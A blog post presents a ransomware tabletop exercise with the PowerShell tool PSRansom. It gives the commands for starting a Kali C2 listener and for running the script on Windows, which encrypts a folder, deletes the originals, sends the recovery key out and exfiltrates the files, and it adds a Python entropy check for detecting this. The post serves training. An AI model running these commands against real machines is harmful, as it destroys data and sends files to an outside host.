Ransomware Simulation with PowerShell: Psransom

Melusi Shoko
Published in System Weakness, Jan 13, 2023


I’m back again this year with a new concept for a project that you can use in your organisation as a tabletop exercise. This helps cyber security specialists, employees and students to learn how ransomware can affect a computer.

We are going to simulate a generic ransomware infection using just PowerShell, thanks to a simple tool called PSRansom, which was created and designed from scratch by Joel Gámez Molina. We will also use both the Windows and Linux parts, as well as its own C2 (Command and Control) server, to demonstrate the exfiltration of files.


On the Internet nowadays, there are several sorts of malware, ranging from viruses and Trojans to spyware and ransomware. In our situation, we’ll concentrate on ransomware.

The number of ransomware operations that take place every day is well known to those of us who work in cybersecurity. Ransomware is a type of malware that encrypts files on a device, leaving them and the systems that rely on them unusable. Then, malicious actors demand a ransom in return for decryption.

In no event and under no circumstances should you fall into this trap, because paying a ransom encourages the perpetrator to profit again from more victims. As a result, keeping several backups and a robust contingency plan is the best approach.

How can we prepare for such an event? In addition to keeping our operating systems and antivirus up to date, it is critical to be able to determine whether an organization’s security measures are effective against this type of attack.

Of course, there are several methods to create imitation ransomware, both commercial and free. In my case, I found a free tool on GitHub.

In this specific scenario, the tool can accomplish the following:

  • Run all or part of the process in memory
  • Simulate file encryption robustly enough
  • Delete original files after encryption
  • Send recovery key to C2 server
  • Exfiltrate encrypted files to C2 server
  • Compatibility with both Windows and a Linux C2
  • Possibility to recover the original files

Let’s see how it works.

First and foremost, because this project is fully written in PowerShell, we will need to install it on our computer if we are not using Windows. Because I’ll be using Kali Linux as my attacker machine, the installation instructions may not work for you if you use a different distribution.

To begin, we’ll download the project and install PowerShell using the commands below:

sudo apt install powershell -y

git clone https://github.com/JoelGMSec/PSRansom

After downloading the project, we will have two scripts: PSRansom and C2Server. The first will imitate the ransomware attack, while the second will be responsible for receiving the exfiltrated data and the recovery key.

Next, we’ll look at what the ransomware script has to offer, and then we’ll experiment with the command and control server. Before we begin, we’ll display the help using the -h parameter as follows:

Please note that I am going to use Windows 10 as the victim and Kali Linux as the command and control server.

Powershell: PSRansom

As seen in the preceding illustration, using the tool is really simple. We simply need to specify the directory to encrypt, the IP or hostname of the C2 server, and the port on which the connection will be received.

If we also want to transfer the encrypted files, we simply add the parameter -x at the end of the command. Finally, if we wish to decrypt, we’ll specify the directory and the recovery key.

To make things easier, we’ll look at some examples below. First, the scenario will be defined as follows:

  • The ransomware will run on a Windows machine
  • The folder we are going to encrypt is located at C:\Backup
  • The C2 server will run on a Kali Linux machine

Now that we’ve established the simulation environment, we’ll put it to use. The first thing we’ll do is check the command and control help to see what options we have:

Open PowerShell on your Kali Linux machine and use the following command: ./PSRansom.ps1 -h

Kali Linux: C2 Server

As we can see, using the command and control server is also extremely simple. We only need to specify which interface will wait for the connection and which port will receive it. In my case, I’ll use port 80 and listen on all interfaces with the command:

pwsh C2Server.ps1 + 80

Kali Linux: C2 Server

If everything went as planned, we should see something like the previous image. Remember that we’ll need full system privileges to listen on all interfaces.

In my backup folder I have put some random files that we are going to use in this demonstration. Please see the image below.

windows

Then, using the following command (where Directory is the folder to encrypt, C2server is the IP or hostname of the C2 and port is its listening port), we will begin the encryption and exfiltration process:

.\PSRansom.ps1 -e Directory -s C2server -p port -x

Windows: Exfiltration process

To do this, a random key of 24 alphanumeric characters (lowercase, uppercase, and digits) will be generated, the data will be encrypted using AES-256, and the recovery key will be delivered to the C2 server.

Once the program is done, the original files will be erased, leaving behind the encrypted files:

Windows: Encrypted files
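As an added example (not part of PSRansom or of this article), here is a small Python check for the victim side of the tabletop exercise: it snapshots the target folder before and after the simulation and reports the two effects described above, the originals being deleted and ciphertext-like files appearing in their place. The 7.5 bits/byte threshold, the .enc name and the constructed sample files are assumptions; the page does not state which extension the tool uses.

```python
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

# Assumed threshold: AES ciphertext sits close to the 8.0 bits/byte maximum.
HIGH_ENTROPY = 7.5


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, close to 8.0 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def snapshot(folder: str) -> dict:
    """Relative path -> entropy for every regular file under folder (e.g. C:\\Backup)."""
    root = Path(folder)
    return {str(p.relative_to(root)): shannon_entropy(p.read_bytes())
            for p in root.rglob("*") if p.is_file()}


def compare(before: dict, after: dict) -> dict:
    """Flag the ransomware pattern: originals deleted and replaced by at least
    as many new files that look like ciphertext."""
    missing = sorted(set(before) - set(after))
    new_high = sorted(p for p in set(after) - set(before) if after[p] >= HIGH_ENTROPY)
    return {
        "originals_missing": missing,
        "new_high_entropy": new_high,
        "suspicious": bool(missing) and len(new_high) >= len(missing),
    }


def demo() -> dict:
    """Constructed stand-in for the exercise: plaintext files, then 'encrypted' replacements."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("report.txt", "notes.txt"):
            Path(d, name).write_text("quarterly figures " * 200)
        before = snapshot(d)
        for name in ("report.txt", "notes.txt"):
            Path(d, name).unlink()                                 # original removed
            Path(d, name + ".enc").write_bytes(os.urandom(8192))   # random bytes stand in for AES output
        return compare(before, snapshot(d))


if __name__ == "__main__":
    print(demo())
```

Archives and images are high-entropy by nature, which is why the check keys on the before/after difference rather than on the threshold alone.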

If we move to the opposite end, where our C2 server is situated, we should have received something like this:

Kali Linux: command and control server

As seen in the above screenshot, we obtain the victim’s details, the recovery key, a list of the encrypted files and, if we used the exfiltration parameter, the exfiltrated files themselves:

Kali Linux: Command and Control Server.

Furthermore, C2 is programmed to do a “payload delivery” via the robots.txt file:

Kali linux: C2 Server.

I hope you enjoyed it and found it beneficial in your future exercises.


SOC Analyst | Interested in OSINT, Malware Analysis, Digital Forensics and Incident Response